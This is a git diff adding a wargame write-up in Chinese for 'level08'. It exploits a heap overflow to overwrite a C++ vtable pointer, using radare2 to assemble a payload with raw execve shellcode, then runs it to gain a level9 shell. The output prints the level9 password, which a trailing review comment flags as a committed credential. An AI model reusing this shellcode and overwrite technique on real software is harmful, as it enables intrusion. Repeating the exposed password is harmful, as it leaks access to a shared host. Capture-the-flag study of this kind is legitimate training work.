Diffstat (limited to 'level08')
-rw-r--r-- level08 18
1 files changed, 18 insertions, 0 deletions
diff --git a/level08 b/level08
new file mode 100644
index 0000000..12206d9
--- /dev/null
+++ b/level08
@@ -0,0 +1,18 @@
+用 gdb 调试,发现 five 和 six 在堆中的地址为 0x0804ea10 和 0x0804ea80. class Number 的虚表指针在对象的偏移 0 处,需要用 112 字节覆盖 six 的虚表指针。虚表指针的第一个字段(偏移为 0)为 operator+.
+
+试了下把 shellcode 写进 five->annotation 中,直接进 level9,看来这题堆区是可执行的。
+
+level8@io:~$ r2 malloc://512
+ -- Try with ASAN, and be amazed
+[0x00000000]> wxs 18ea0408
+[0x00000004]> wxs 31c004c9cd8089c389c189c231c004d0cd8031c0040bbb1f43583081f33030303053682f62696e89e331c931d2cd80
+[0x00000033]> 100 wxs 61
+[0x00000097]> wx 14ea0408 @ 108
+[0x00000097]> wtf /tmp/exp.bin 112 @ 0
+dumped 0x70 bytes
+Dumped 112 bytes from 0x00000000 into /tmp/exp.bin
+[0x00000097]> q
+
+level8@io:~$ /levels/level08 `cat /tmp/exp.bin`
+level9@io:/home/level8$ cat /home/level9/.pass
+ise9uHhjOhZd0K4G
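Review bot: the last line of the hunk commits the level9 password in clear text (the value printed by `cat /home/level9/.pass`), which is a live credential on a shared wargame host; redact that line before this file is published or keep only the command without its output. A smaller documentation point: the prose gives the layout in terms of object addresses (five at 0x0804ea10, six at 0x0804ea80, vtable pointer at offset 0, "112 字节" to reach six's vtable pointer), but the r2 transcript works in buffer offsets (`wx 14ea0408 @ 108`, `wtf /tmp/exp.bin 112 @ 0`) and the two are never tied together; a one-line comment stating what `18ea0408` and `14ea0408` point at and why the pointer write lands at 108 while the dump is 112 bytes would make the writeup self-explanatory.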